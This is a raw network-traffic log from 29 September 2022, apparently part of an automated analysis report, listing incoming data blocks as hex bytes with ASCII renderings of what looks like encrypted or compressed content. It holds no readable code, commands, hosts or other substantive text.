                                                                                                                                                            2022-09-29 12:45:04 UTC10493INData Raw: 8a ac b8 d1 29 05 19 47 48 43 69 12 1f 87 a5 64 0e d2 19 a8 e3 b0 cf 56 de df 41 9c 42 c6 67 94 a8 14 1b 3c 90 60 50 bc e0 8f 72 00 82 2a e2 32 2d e4 81 67 74 c7 e1 50 45 f0 bd d3 c6 db c2 3d b0 eb 66 98 5b a0 18 9c 61 82 27 bb 69 73 22 0e 94 69 22 ac 49 3f 2a f3 14 b4 f4 36 9e 2f 1a 26 84 e5 08 41 ca c5 27 7e b8 1f ce b0 35 83 a4 74 50 c3 c4 8f f3 53 e3 9e 30 40 e8 bc 3a 4b 37 77 bb bd c0 20 4b 16 5d 59 56 b9 45 f5 c1 9d be 8e 9a f5 3b 60 2d 80 c4 a4 8b 37 64 02 a0 46 b2 a6 d8 7e 69 5c 42 74 12 98 ee 2b 9f ec 36 27 fe 24 a5 5b da 4f 8b 9a 87 c1 f3 f5 44 85 b1 5a 9f ed 4a db ea 35 db 93 d4 f0 45 20 16 f6 6c 6e 20 cf 6d f2 cd 9f 5d b7 19 fc 6a 46 0a 9d 07 04 e5 fa d1 2a 8d b8 11 4e a2 d1 ff a3 4e 5a 56 46 75 d3 98 00 5a d1 6a 6d e0 76 06 2f 61 c2 43 dc 46
                                                                                                                                                            Data Ascii: )GHCidVABg<`Pr*2-gtPE=f[a'is"i"I?*6/&A'~5tPS0@:K7w K]YVE;`-7dF~i\Bt+6'$[ODZJ5E ln m]jF*NNZVFuZjmv/aCF
                                                                                                                                                            2022-09-29 12:45:04 UTC10494INData Raw: e9 df 1d 84 48 a4 46 6f d5 4c 87 98 a0 fc 6c c3 d8 50 11 e8 cf 2d c1 31 e3 43 72 1d 86 35 16 48 bd bd 6e 07 b9 96 bd 57 c8 9b fb 4f 81 94 c8 74 b0 55 09 f9 a1 f7 8c 2f 8f 6a 7b fd 9b bf 1b ac 99 e3 be d2 ae 41 8e 79 0e 01 e8 b0 4a ba d1 7f 78 de 35 ba 99 7f f3 9b fe 05 75 ac 07 18 f8 53 8f 34 83 0c 9f 77 3a b4 5b b1 65 04 22 58 c6 d5 bf 31 f6 81 71 d9 96 25 3b 32 b9 aa 13 14 28 ea ca 35 43 2c 11 05 a8 39 ef 46 3c bc 92 3d 6a 64 e9 fe 3e 5c 04 25 59 82 83 77 4d c9 63 c6 63 bb 55 54 d5 c8 4f a3 32 57 6c 39 bf 71 72 9f 00 64 3e 62 88 9c 07 c0 ab bd 87 a3 99 3d a4 5e aa b7 56 42 9a 60 e7 3f bb cd 7b 18 05 f7 ac 5f fc 8b f0 f4 52 89 b7 97 e9 35 bb c9 64 00 44 d8 b7 ae c6 a4 80 c5 f9 7f fa b4 09 15 c6 08 80 80 56 b4 b7 d2 47 ed a3 2c da 5e 82 31 36 db ce e7 41
                                                                                                                                                            Data Ascii: HFoLlP-1Cr5HnWOtU/j{AyJx5uS4w:[e"X1q%;2(5C,9F<=jd>\%YwMccUTO2Wl9qrd>b=^VB`?{_R5dDVG,^16A
                                                                                                                                                            2022-09-29 12:45:04 UTC10496INData Raw: a2 02 c3 cc 46 53 58 2e ee 8b 01 ae 7e 91 39 3b f9 da ea ba 2f e4 d0 e8 72 b8 e7 1a ab 03 78 fb ed 46 44 19 29 3a 52 37 89 82 bc 19 44 ac a4 63 ad 11 ee 4b 56 a2 29 6e e1 7d a4 7c 6d d1 a8 85 b5 79 f1 6e f9 af a7 e1 8c 49 1a c4 be d2 9b 6b 7e 15 c5 69 31 f4 79 20 8c 8f f2 3e ed 21 03 2d 09 dc a9 5f 4a 7d f5 4b c0 6d 8a 13 28 f6 02 a5 2f 39 bd 21 9a f8 3c 13 30 d4 3e 9d 1d a0 bc cf d7 fd 2c 3b da 32 d0 9e 1b 91 da 49 54 39 eb 3f b3 f3 82 cb 07 a5 c5 67 2b 41 4b 03 55 fe 21 e1 86 63 9b ff d1 ed c7 3f 57 ed 14 f8 df fa 8f 5d e8 08 80 f3 c4 bb 99 2e e0 25 3e cd a2 bd 98 44 ee 68 d6 96 82 9b 1f b1 22 40 2d 13 d0 01 c4 e1 99 ec 96 e3 2c 17 a9 80 28 6d 72 71 b6 67 f8 d3 63 3f e4 26 2e c9 6a 00 fb 12 ad bc ae b3 df 82 21 9a b3 23 c3 22 2b 63 0e 33 10 04 f0 a8 7a
                                                                                                                                                            Data Ascii: FSX.~9;/rxFD):R7DcKV)n}|mynIk~i1y >!-_J}Km(/9!<0>,;2IT9?g+AKU!c?W].%>Dh"@-,(mrqgc?&.j!#"+c3z
                                                                                                                                                            2022-09-29 12:45:04 UTC10497INData Raw: 98 3d cb 7a 93 ff 59 5b ef 69 63 03 f7 4e ef 04 c4 77 56 3d 50 ee c3 4a 8d 12 b7 d1 98 c4 71 ee a1 56 83 44 40 4a 82 67 83 ac 5b fc 84 dc 08 d9 69 aa 9b ec f0 26 f4 1d 5f 7c 26 f3 0b 5a 33 d8 c3 74 9e 51 8e c9 ae 6c 2c d3 c2 f6 0e 68 1f 18 70 a1 00 42 1f 45 9f ad 82 f2 2f 83 14 3f 41 f3 8a 18 1e d3 04 c6 33 5a dc b3 47 25 ae f3 eb 1f 04 cd 4c 3c 8e 66 bb a9 4a ae 9f f7 1e 09 7e c6 64 e7 26 01 a7 ef 94 ba 09 8a a0 59 3f 4c ac ca b6 ee f8 be 18 76 55 5d 68 3f 41 e7 64 e2 ee b4 e5 f0 7b a6 f2 51 48 08 42 d8 f3 11 44 6f 0e 1d 6f 1a 23 9b 54 0e 1f 62 6a be 09 17 ab 55 b4 a7 8e 20 a9 fe 4b 6f ff e8 a2 89 ec 12 f3 04 28 9d 67 a8 9f f4 e6 8f f8 e5 2e c2 ab db 9b 89 d2 cb 25 71 34 b9 a9 14 e3 8a ce 47 8e b6 91 3d 59 0e 2c 39 b5 d6 eb 39 61 4b e1 5e f1 65 3d d1 e3
                                                                                                                                                            Data Ascii: =zY[icNwV=PJqVD@Jg[i&_|&Z3tQl,hpBE/?A3ZG%L<fJ~d&Y?LvU]h?Ad{QHBDoo#TbjU Ko(g.%q4G=Y,99aK^e=
                                                                                                                                                            2022-09-29 12:45:04 UTC10499INData Raw: 37 6e 8c 8b 7e 3b d8 77 84 8c 17 c3 f6 c3 33 1c ad 4b ff b2 10 10 17 92 73 d8 f4 2b ee c7 25 a6 39 ec c5 80 58 f4 2b a3 a3 c5 be 5a 79 18 f8 d8 59 69 2b 12 85 4f d1 ee e8 21 e3 dd bd 0f 13 c8 a4 9a 04 52 dc 2d b3 2e 81 a6 01 96 4f 2c 9a 40 c0 34 be 8e 49 aa 62 2e 09 03 d1 19 c6 38 21 4f ee c2 10 1f 53 c1 f5 61 3e 02 d4 e3 8b f6 fa b5 c7 58 d4 44 90 04 8a 72 04 da 70 87 cb 42 f8 df 78 72 4b 7e cb 5a 44 ac b4 3f 62 ba 43 7e 51 4c 82 21 51 f2 da e7 9c 68 cb f7 1a 0d 40 ae e1 73 53 7b 12 e2 aa 91 c3 79 59 78 1b 9d 5f 53 68 d7 0b 50 d1 ed b2 1b ae 22 66 a3 21 f2 54 3f 2e 89 d7 ed 81 54 b0 84 18 63 50 41 fb c1 e1 12 61 ae 56 0d 16 d2 1e f3 b8 64 94 8e 68 ae ed f6 eb a6 4e 28 4d a0 1e 73 92 59 0e 8b 22 54 cb 5e 19 dc 1d 1c a0 ad 99 e8 2e 48 b6 0c b5 92 69 b3 0e
                                                                                                                                                            Data Ascii: 7n~;w3Ks+%9X+ZyYi+O!R-.O,@4Ib.8!OSa>XDrpBxrK~ZD?bC~QL!Qh@sS{yYx_ShP"f!T?.TcPAaVdhN(MsY"T^.Hi
                                                                                                                                                            2022-09-29 12:45:04 UTC10500INData Raw: d8 3a 4e df 5a 63 d6 c1 93 b8 28 ef 36 97 0e 26 0c 8f eb 47 af f9 b0 34 e8 2f 09 9b 72 71 ef dc 63 df ad 52 42 37 cc 13 65 a6 4f 19 df 41 01 c0 27 d9 db 68 2f f1 bb 07 0c 7d 65 2d d3 14 2a ad 90 e4 2a 9e 82 ea 23 94 32 eb ba 0e af a5 30 66 b7 c8 15 f0 74 3d 7f 89 31 fd d9 b0 5a 75 dc a8 33 a2 5c b0 3d ce 1e 95 f5 ff be 48 70 f7 47 95 53 5e fc 0f 17 1e 0c 15 86 19 05 a5 5c 23 f0 38 2b be 40 d5 e3 a3 43 7c 93 a8 9d 36 53 b7 59 ca ce ae b1 dc 93 19 51 21 04 4c ac 8e 79 8b a1 31 a6 ab 95 7b 40 28 67 4a f8 a9 c2 69 b6 09 6c 4f e2 ba f0 b8 f2 a4 93 be 3d 7c 3e a4 6d c8 ad 1e 32 1f e1 86 cf 5d c4 60 74 a1 26 70 17 5a 2f 33 4d 26 7a a8 99 22 69 ac bd 22 57 46 d9 cb ae 64 38 60 bd e3 8f 61 c2 bf ef 2b 12 c6 00 b8 67 c3 a0 da bd da a1 b7 b1 6b 7a bd 0e f3 5b 37 77
                                                                                                                                                            Data Ascii: :NZc(6&G4/rqcRB7eOA'h/}e-**#20ft=1Zu3\=HpGS^\#8+@C|6SYQ!Ly1{@(gJilO=|>m2]`t&pZ/3M&z"i"WFd8`a+gkz[7w
                                                                                                                                                            2022-09-29 12:45:04 UTC10500INData Raw: bc ea 4b 9a e6 66 5e eb e0 f1 9d 91 38 2a 1e b7 26 0d 33 81 fe 18 b0 62 41 aa c6 ec 87 d3 8a 43 8d 15 98 80 b2 ed 72 75 73 3c 5b d4 d4 bb bc 0e 52 42 cf a5 cc 8f 9e 2c 5b a4 90 cf 49 4c 2a bd dc 4a ec a4 22 07 d6 7e 8c 4c 4b 9f eb c1 f5 b3 60 5d a9 09 30 cd 29 37 7a 61 7c 49 fe 5f 1a 5d af 7d fb 06 a1 aa 83 16 13 5e ee 33 ba f3 15 86 7e fe 50 a6 87 98 40 6f 9b 44 e4 d6 ad eb 47 3d 63 82 58 2a 83 10 56 71 b2 02 68 9b 44 d0 7d 72 14 9f 0e 9e b5 3c b9 4a f1 87 68 93 7f 8a 99 64 6e 78 97 02 d7 ea 58 4e bd 75 80 0b a3 69 2c d8 ef 49 08 f7 6e 08 48 41 7c 17 2a 2b 28 00 e7 0e 01 fc 7b ad bf a0 7c 5c e8 25 d0 e7 de f0 48 33 50 d0 0f 65 00 20 45 92 c1 8d 17 ff 4c cc f9 8d d7 8e 5a a7 a3 93 fc 7a de f3 8d 95 69 85 b4 96 05 cf 12 90 c0 dc 8e bd d3 da f9 6e 84 66 6b
                                                                                                                                                            Data Ascii: Kf^8*&3bACrus<[RB,[IL*J"~LK`]0)7za|I_]}^3~P@oDG=cX*VqhD}r<JhdnxXNui,InHA|*+({|\%H3Pe ELZzinfk
                                                                                                                                                            2022-09-29 12:45:04 UTC10516INData Raw: ef c7 ae 79 f6 82 fe 27 f5 de cc c2 70 78 c4 2b 39 1c 1a 14 cf 70 d0 7d ff e3 af 49 4f 20 71 c4 1c 25 71 e5 c0 b6 7f c5 77 d0 c7 ea df 29 06 58 45 11 58 63 15 c0 d9 63 7b cc 69 8a cb 3c 22 c0 c6 7f ee d7 10 39 91 be 29 25 d4 ac 3b 4d 62 74 e0 a1 6e a7 1e 6f 20 80 87 9f 64 01 3f e1 18 cd e1 b5 37 c3 46 de c3 0c a6 bc f6 29 6d 79 5e 65 2a 1a fa f7 25 37 45 c4 90 b2 24 cd af ef 53 47 31 f5 b1 f5 10 d2 cc 4f 23 64 9f 76 59 37 31 b5 c7 ed 70 68 d8 8e 7e a4 51 10 58 c5 8e 8a c9 ae 3a 9d e4 f3 45 ba 58 50 c3 69 1d 76 96 62 99 35 57 6e 6f 02 fd 05 7a 53 15 85 c5 a1 32 f4 45 fe 8c 4d ae dd 54 48 a5 f4 37 c7 2e 47 e0 ed 43 76 46 95 74 1b 6e 77 8c cf 4f be 9e 6a 94 e6 f1 f7 6d 9b 77 d0 f3 33 91 4c 62 37 5c 14 46 fb 92 ef 1f 61 c9 51 08 a3 49 71 79 a7 c9 ef 5e 3e 87
                                                                                                                                                            Data Ascii: y'px+9p}IO q%qw)XEXcc{i<"9)%;Mbtno d?7F)my^e*%7E$SG1O#dvY71ph~QX:EXPivb5WnozS2EMTH7.GCvFtnwOjmw3Lb7\FaQIqy^>
                                                                                                                                                            2022-09-29 12:45:04 UTC10532INData Raw: 78 78 6e 8f 21 3d b7 d8 49 82 de 6b e3 67 12 19 a2 af 50 ee 00 73 28 15 0c d8 ed ec ca d1 e3 0e 89 8c 5d 4b 57 8d 3f 53 2f 49 8a 85 b1 c8 68 d3 05 3d 00 41 3f 4f 8c cd 51 09 f9 dd 7d 1a fc 5f 69 18 12 33 3d d2 8e 6f 00 32 69 f1 29 0a 3d 5f 5c 30 83 83 07 af 4f 6d e0 dd 66 7f aa 02 07 ae d0 8d 1f 24 42 1b 32 2a 0b 40 84 8a ca bd e0 f1 5a 47 cb 7c 8f bd 0e ca ae 7e 8b 53 a1 66 4a 34 18 99 be 4c f7 73 63 25 1f 7a 70 23 05 07 95 37 06 98 75 83 30 27 ce eb fd aa 37 3d df 10 ad 69 fe 71 3a 04 6a 07 f2 be 8b d7 f1 34 80 15 02 cf a1 27 70 04 ab eb c6 75 5c ec 28 43 ad cc 88 f1 9f 95 f6 31 06 1a b1 ad f8 e9 5e fb 63 14 6b 09 53 1f 74 5f b9 3d dd 6c d7 56 23 51 56 6d c2 c7 a1 7f 54 cc 55 fa 54 23 df 2f 93 9f bc 9e b7 11 f5 68 ed 32 c4 69 77 25 16 c0 ba 96 b0 e9 b4
                                                                                                                                                            Data Ascii: xxn!=IkgPs(]KW?S/Ih=A?OQ}_i3=o2i)=_\0Omf$B2*@ZG|~SfJ4Lsc%zp#7u0'7=iq:j4'pu\(C1^ckSt_=lV#QVmTUT#/h2iw%
                                                                                                                                                            2022-09-29 12:45:04 UTC10548INData Raw: 4e 66 1f 75 85 15 14 b0 cb 53 12 11 57 60 31 e5 f9 6c 54 d3 9b 99 d2 b2 39 fe be 3a 0f 84 38 5f 1f b0 2c e3 da d3 f9 a6 4d 50 ae 2e 88 7e 3a 9f 0c fe 03 19 d5 50 8f e1 5d fc 53 be 36 c0 49 0a a5 60 d8 ca 4f 9f 64 53 60 14 1d e0 00 3c 02 2b f0 33 99 8b 05 64 fb 9d c8 8f 57 62 c4 29 25 be 71 ec fa 50 8f 6f f1 81 b9 bf c0 fc 48 33 b8 83 51 f4 40 00 c2 0a d8 33 87 70 76 30 0f f3 97 74 02 89 f5 36 94 6c e1 0a 5e 17 73 b6 d3 c9 6e 14 fe 3a ce c8 d3 a4 98 89 df 1e 4d e9 8e cd 61 67 b2 80 26 f9 42 3c f6 fe ba dd 6b 46 44 92 ef 10 b7 be 53 95 2a 59 f5 de 1e b3 7d 0f 53 59 11 e7 fa 6e 21 5a fb 8e 04 14 b6 52 8e 9c 83 ce ec cc d6 2c 9b e6 0a 29 4b 39 1f e8 bb 75 67 4b bf 20 a5 4a 2e 00 45 20 f1 9f d1 48 8e fc 0d 79 ad 60 97 ee 19 64 35 6d 14 e7 37 5d 9e fe 97 7c f0
                                                                                                                                                            Data Ascii: NfuSW`1lT9:8_,MP.~:P]S6I`OdS`<+3dWb)%qPoH3Q@3pv0t6l^sn:Mag&B<kFDS*Y}SYn!ZR,)K9ugK J.E Hy`d5m7]|
                                                                                                                                                            2022-09-29 12:45:04 UTC10564INData Raw: 32 56 73 26 f7 50 11 52 6f de 40 1b 05 bc 38 47 46 90 cd 74 4e ff e1 22 f4 3f 0f 6a f4 3e b4 1a db fb eb 91 34 a5 cc db 0e c1 82 92 25 b2 df 02 2e c4 3c f5 6b c9 a6 cc 07 a2 3d e5 03 af 44 1b 31 32 20 a2 5d b6 19 f3 cc e8 71 32 3f 79 c2 3d ae de 8c 74 e1 c2 b8 3e c9 f1 31 fa c6 51 02 76 d3 18 d2 4e 41 55 a2 3d 95 6a 49 b0 d8 cc f9 fc fa e4 68 c4 11 96 51 38 ee f4 3b c1 47 8f b7 72 42 c9 2b 4c df 80 e8 fe 8f d0 a6 84 2c c2 32 18 10 43 31 bd 14 16 12 ed 91 ae ae 2b 19 8f a5 18 0d e9 54 01 96 55 39 d3 e1 bd df e0 31 4d b7 ca 9b 42 92 3b 00 f8 14 2d a0 b6 f1 31 63 2d 1d 05 80 4a 86 68 2c 16 45 e7 74 9e be ea 8b e1 25 2a fe c5 41 31 66 8c e1 46 37 1d 02 5d c9 cd 79 58 86 2b a1 b0 56 e1 0c 5a b5 cd a2 f4 e9 71 a2 11 4f a0 2e 5c 2a 7e af da ca f6 68 b8 63 c4 46
                                                                                                                                                            Data Ascii: 2Vs&PRo@8GFtN"?j>4%.<k=D12 ]q2?y=t>1QvNAU=jIhQ8;GrB+L,2C1+TU91MB;-1c-Jh,Et%*A1fF7]yX+VZqO.\*~hcF
                                                                                                                                                            2022-09-29 12:45:04 UTC10580INData Raw: e3 a3 7c d4 e6 d1 b9 da b8 20 d7 0d 23 54 0f 95 16 11 da 12 e7 66 b3 57 0a e6 8b 64 9a c7 9c 76 69 69 e3 7a ec 35 c4 d1 f6 b8 5f e0 10 14 c8 7e f9 75 43 de cb da 3b 94 27 48 4e 88 b4 41 4f 50 c8 22 5a 7e bc b7 55 4f 04 b3 14 2a fd 6d 86 17 f9 d4 fa a7 8d 22 af eb be 6b 00 46 b5 a7 ff 31 0e 14 65 a0 ec bc c6 a5 45 01 85 97 5f 7f a6 92 a0 b8 43 40 5e 43 67 da a2 f4 72 6c 6d b2 91 f1 3c 9f b6 dd 19 8e b9 5b 17 76 77 f4 e6 bf 13 97 95 17 24 b3 26 55 e3 15 60 69 cb a0 e5 aa 7e 36 99 3b 02 b8 0a 51 7c 67 7b cd 53 81 3e d8 86 1f 5d f3 f1 70 51 78 60 6d 9d 12 a3 c4 bb d0 10 9a 3a 64 4d 1c 93 f5 44 3f 75 30 05 6c b6 ec 30 c8 71 02 c9 58 a4 94 7c c6 10 94 3c 5e 8a f2 c3 4f 88 12 82 16 fd b2 2c 75 02 3c bb 08 82 91 f4 28 8c 4c 42 7d f0 30 ee f6 f2 1f b2 20 6e 8e 7a
                                                                                                                                                            Data Ascii: | #TfWdviiz5_~uC;'HNAOP"Z~UO*m"kF1eE_C@^Cgrlm<[vw$&U`i~6;Q|g{S>]pQx`m:dMD?u0l0qX|<^O,u<(LB}0 nz
                                                                                                                                                            2022-09-29 12:45:04 UTC10596INData Raw: 6b 36 b6 e8 13 43 96 36 b6 5d 35 e3 1e 4d ea ef 2a 20 48 f2 67 bd 26 04 54 06 ec 2f 9e 0d 25 55 92 ce aa 66 1f 14 f9 62 56 5d 79 a0 53 2b 7d 7f 7f f1 99 bc 4f e0 95 7e 33 f9 f6 98 ac ac 4d 3a 42 58 df 8e c2 fe dd 12 eb e2 d9 58 2c 29 34 2b 15 72 10 b0 a9 1f 2b ad c6 27 a2 c7 8d 5a b3 9e 06 1a 08 93 b6 d8 af bf b7 fc 1f eb da 4d 10 19 d9 9e f3 2e 0b d5 fd bc a6 d5 ba dd 67 1f 5f b3 03 5a b1 a3 86 d2 01 c9 00 58 a9 52 ca 6b 5a c7 6e d0 4d 84 02 41 0c 36 aa 17 3b d5 49 82 ae 1e ef 8c 56 f5 a3 7e 90 e9 0c e9 e3 97 5b f1 9c ab d8 ec 7e 81 a7 9c b4 9e 2d 75 d9 0f 5f 9f 17 ed 17 7f 3c a4 33 b4 1a df 9d 70 90 7c 84 3f 7c ac 51 51 a6 0c 60 e3 94 f5 05 e1 96 8f 8f ea b0 52 e9 d8 0a 25 0b c0 af 38 60 51 2d 5c e8 a6 e9 26 0a b6 44 be a7 71 ea 9b 36 46 dd 10 01 3b e6
                                                                                                                                                            Data Ascii: k6C6]5M* Hg&T/%UfbV]yS+}O~3M:BXX,)4+r+'ZM.g_ZXRkZnMA6;IV~[~-u_<3p|?|QQ`R%8`Q-\&Dq6F;
                                                                                                                                                            2022-09-29 12:45:04 UTC10612INData Raw: 06 09 a9 06 01 e5 2f d9 89 c3 7f 5e a6 73 6d f7 35 77 ad 31 78 00 c9 88 b9 16 27 58 0a 55 f5 60 e5 40 c8 1d 29 d1 21 e0 42 51 ea 0c 75 50 b4 8f a2 b6 76 66 fe 23 5e b9 9f 55 39 de ae e3 15 60 1a e5 5b 31 f9 87 19 8a 95 6b 9a f4 66 21 ab f0 cb 19 c8 0e cb 45 50 0e 59 5a bd f5 02 f2 84 b0 41 33 07 64 a4 20 8b d4 f5 28 b9 ac 86 db 38 8f 14 e7 e9 6d 48 cc cb a9 65 8b d6 b0 6d ba 34 29 19 aa 15 52 02 05 de c0 03 34 e2 d8 79 c3 a0 4b ec 44 a2 1c b9 9b b0 6b 0a 7e ed b6 e3 1c 42 1c cc b5 28 8b 1d 47 0b a5 67 ab 69 28 6a b8 34 9c de 62 f9 c5 e9 9a 49 3d 45 99 e0 21 78 6f 7e 55 d5 90 4e ec 1f 54 e6 23 83 a6 6c 08 09 e2 ba 03 8e 7d 9c d7 9b 90 f4 7c cb c8 a9 86 20 5c 5b 53 c3 52 56 39 6f a7 05 92 77 b2 6f 9e e5 aa 56 bb 04 55 9d e6 b0 3e f3 f8 36 64 87 8a e0 5c 19
                                                                                                                                                            Data Ascii: /^sm5w1x'XU`@)!BQuPvf#^U9`[1kf!EPYZA3d (8mHem4)R4yKDk~B(Ggi(j4bI=E!xo~UNT#l}| \[SRV9owoVU>6d\
                                                                                                                                                            2022-09-29 12:45:04 UTC10628INData Raw: 9e 4d c3 40 46 71 8d a9 94 fc 31 c0 14 4f b4 4c a1 c4 6e 5b 51 0a 6c 33 6a 42 09 e3 3e 80 80 84 91 c1 19 8f 3a 24 6b 12 ff 08 a3 9d cb 9f 4d eb ef 58 54 c7 b8 0e 51 85 a1 aa ff 83 50 fa ba 35 df 14 cd cd 4e 85 66 e4 50 38 de 68 78 7e 3d 09 94 2b 0e 08 24 09 c1 15 15 49 14 1b d8 7f 7e 8d 88 a1 d8 e4 81 dd 57 4b 03 fa 2c 6d 2d f1 7b 20 ed 36 bc b7 b2 60 1c 66 c4 26 1f 5b f2 6a 63 69 e5 d5 b2 ea ac 14 e6 a3 7d 53 b0 72 48 dd 08 0b ac bd d6 7b c7 ea bd 64 7b e9 22 75 af e1 41 4f be 42 9a c9 c7 69 f7 9f 5c dc cd 13 e1 de 3c e0 b6 c0 de f4 3c e6 6a 4a c2 7a 2b b0 9c b4 6a 30 ab 4e 44 4c e6 c2 43 4b af 48 c7 23 f5 2e 16 4e 51 98 dd c0 c4 18 45 6a f9 a5 90 a9 2d 73 09 7a a8 4b 38 73 f6 7c c8 fd a8 69 0a da 42 ca 8c a3 f9 4b 75 54 d2 f9 41 3d 36 64 50 ab c4 b4 c6
                                                                                                                                                            Data Ascii: M@Fq1OLn[Ql3jB>:$kMXTQP5NfP8hx~=+$I~WK,m-{ 6`f&[jci}SrH{d{"uAOBi\<<jJz+j0NDLCKH#.NQEj-szK8s|iBKuTA=6dP
                                                                                                                                                            2022-09-29 12:45:04 UTC10644INData Raw: 21 b6 2d 3c 12 c5 11 b2 8a c8 1e c7 18 07 f3 38 4a 11 8f 25 ed 9b 29 ca 70 96 e5 b5 06 85 ad 1c 3e 32 f1 c2 7c d5 11 4c 6b d9 c7 25 2c 4f a8 d1 4d 66 b8 0e 6c 5e 6b ba fc 09 87 48 c4 1e 85 86 da a1 4c 1a 70 8b c3 1d bf 09 5d b3 56 9f cc ed cd cb d0 8f b1 7b a9 de eb 9a 44 53 9e 93 45 c6 7d e2 5c f2 0e ed d8 57 cc ef 9e 7e 3d fa 3c 1e 9c e6 29 8f f2 a3 d9 d2 78 82 46 8e 55 6f 1f 23 42 4c 8a 19 04 67 e9 f0 62 9b 6b 02 ac 29 8b 84 0d aa 4d 73 27 15 1f 00 03 65 1f 08 7d 44 4a d7 e2 a2 58 d7 47 39 a3 db 21 69 8a 79 af c9 0b 10 8c d8 6f 0d e6 58 1a 97 ae dd 49 96 0e 1f 44 fb bc 9e 93 33 db a1 ca 35 c5 c0 2c 02 c4 6e c3 69 9e f1 f3 0b 74 7f a6 d6 05 fd dc c6 9f 07 0a cc 30 0c c0 eb 1e 11 2b 88 ed 41 16 51 32 3f ec 17 4a ba c8 ca a9 f6 d5 73 e6 43 ec 48 1c 29 0c
                                                                                                                                                            Data Ascii: !-<8J%)p>2|Lk%,OMfl^kHLp]V{DSE}\W~=<)xFUo#BLgbk)Ms'e}DJXG9!iyoXID35,nit0+AQ2?JsCH)
                                                                                                                                                            2022-09-29 12:45:04 UTC10660INData Raw: fa 9c 3d 5c c8 ab 71 0c 80 42 09 d6 70 e1 f8 90 60 55 42 e0 54 96 ab 96 9b 66 32 8d c7 78 50 88 0c a1 6e 7e eb bb bf 9e 49 50 59 67 62 75 de 4b b3 86 43 46 dd ba cd b1 6d 90 76 5e e4 ad d2 89 37 c1 f3 7b 15 d7 38 a9 af 2d 0f 57 bc 9b 93 b2 aa 33 05 09 af d2 85 72 87 f3 a9 73 3d 7e 7e be 82 dc 8a 8a ff 61 a5 80 c2 10 d4 cb e1 20 58 69 d6 91 16 0d e8 c8 37 79 5d 2f 47 60 20 11 69 4c 2d 84 c9 58 5d d2 30 95 cb 17 6f 88 c3 32 c3 b9 07 c1 27 f0 07 3c c6 f6 cd e6 ce 6c ad a5 c9 0f 65 aa b2 65 a2 54 c1 b6 0d f7 0f 96 b3 20 6a 94 cc fa e1 07 e5 73 dd ed 3c 59 f6 94 44 73 02 a8 45 ed 24 0f db 45 1b 6f fd 97 a2 3a 74 b3 c9 41 75 ca ef dd 67 93 ca 02 ee b2 74 f8 37 36 a7 18 ab 22 39 65 1d a5 4b 7c de 74 01 0f f5 d1 2a 37 d1 35 83 66 c2 5e 4c 51 f3 2b 58 fb 70 36 37
                                                                                                                                                            Data Ascii: =\qBp`UBTf2xPn~IPYgbuKCFmv^7{8-W3rs=~~a Xi7y]/G` iL-X]0o2'<leeT js<YDsE$Eo:tAugt76"9eK|t*75f^LQ+Xp67
                                                                                                                                                            2022-09-29 12:45:04 UTC10676INData Raw: 58 cb 79 79 10 28 fb 2b b2 8c a6 b4 81 cb be 67 d0 5f ca cc 3b 89 9e 59 b2 95 f7 0d 35 ad 2f 03 ab 35 a5 c0 3a 5d ab 03 e3 df ee b6 03 d5 40 59 3e 20 67 82 8c cb 59 06 d0 47 32 5c ad e1 22 29 74 3e 0f 0d da 9e fe 25 50 72 9f b0 ff b6 6c e8 65 db ac f8 36 2a 95 e5 6e 5b 4f f4 3e 7b 70 bf 18 c2 e4 9b 1c 5f b0 66 8a a2 af 0f a8 41 dd 8c c4 79 17 7f 10 bc 50 0b 72 99 86 fd 93 de 0e 3c db f2 96 f7 54 d0 98 f3 b1 0e bf 02 91 b2 79 0f be d6 e0 c0 5b a4 bd 02 78 5c 11 03 88 4e a7 3b 82 ef 38 d3 ee ae 22 30 6c da 5c 93 fe f7 6a c8 6f 90 ee a8 14 75 fe 8f e9 80 1a 4f 04 21 2c 34 be 7a 0f fc cb 27 27 46 e6 bb 09 71 c2 d2 99 65 59 89 cd cf 03 4d 9c 0e 70 f1 d0 73 a8 57 fd 73 ca e7 a9 0f 72 6b 56 99 72 04 af 80 90 ea c8 00 d5 f6 63 ab 1e 7e 67 15 69 e0 e6 9a 11 3a 51
                                                                                                                                                            Data Ascii: Xyy(+g_;Y5/5:]@Y> gYG2\")t>%Prle6*n[O>{p_fAyPr<Ty[x\N;8"0l\jouO!,4z''FqeYMpsWsrkVrc~gi:Q
                                                                                                                                                            2022-09-29 12:45:04 UTC10692INData Raw: 0f 26 2e d8 13 3c 80 35 f2 66 bc 9d 50 92 37 8f 68 eb b0 f1 84 4a a6 6b 9d 2d 39 19 fe c1 ef 6f 0c 81 44 ac 33 75 d8 1e 16 1c 64 f7 f4 04 3a e6 8f 05 38 9d 35 ce 40 2d d8 d5 71 7c 1d 88 f1 f1 a3 85 bd 32 55 76 f1 9f b7 64 84 5d 50 20 87 37 67 14 58 9e a8 db d2 51 ec 84 d9 ee 6d 0f 79 bb 3d 80 19 ab 07 de 14 5d f8 7a 30 da 34 89 f4 c8 4c eb cf 99 f6 e4 b1 b3 b3 05 2f 63 72 9d d8 11 29 54 59 14 bd c9 fe 6e 5c 73 d5 b6 d2 da 45 9e 00 a2 91 44 65 45 91 a4 a1 4e 08 3b 2d 95 11 81 a3 c6 96 46 d6 39 ec cf 9a f0 74 de 48 84 3f 82 a6 f2 ad 34 ae ed 52 e1 1f 0a 2f 03 60 b9 2e 45 f9 73 2e e6 da 24 4e f8 61 5d 6d 52 ae 2e 76 f6 e0 0c ab a7 0c ea 9a d9 1b c8 d1 b4 a7 62 fb 52 bb 23 5c 38 8a aa 75 63 3d 8c dc 97 39 f7 07 0d c5 d7 d0 97 9f fd c9 77 ac 23 02 5d a4 53 ca
                                                                                                                                                            Data Ascii: &.<5fP7hJk-9oD3ud:85@-q|2Uvd]P 7gXQmy=]z04L/cr)TYn\sEDeEN;-F9tH?4R/`.Es.$Na]mR.vbR#\8uc=9w#]S
